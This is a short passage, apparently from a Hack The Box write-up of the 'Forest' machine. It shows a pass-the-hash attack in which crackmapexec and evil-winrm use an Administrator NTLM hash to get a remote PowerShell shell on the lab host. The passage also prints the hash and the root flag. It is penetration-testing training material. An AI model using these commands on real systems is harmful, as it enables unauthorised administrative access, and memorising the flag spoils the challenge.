└─$ crackmapexec winrm 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
SMB 10.10.10.161 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\Administrator:32693b11e6aa90eb43d32c72a07ceea6 (Pwn3d!)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ evil-winrm -i htb.local -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
5b0ca47df9aaf22d49b05d4561e16c61
*Evil-WinRM* PS C:\Users\Administrator\Documents>
|
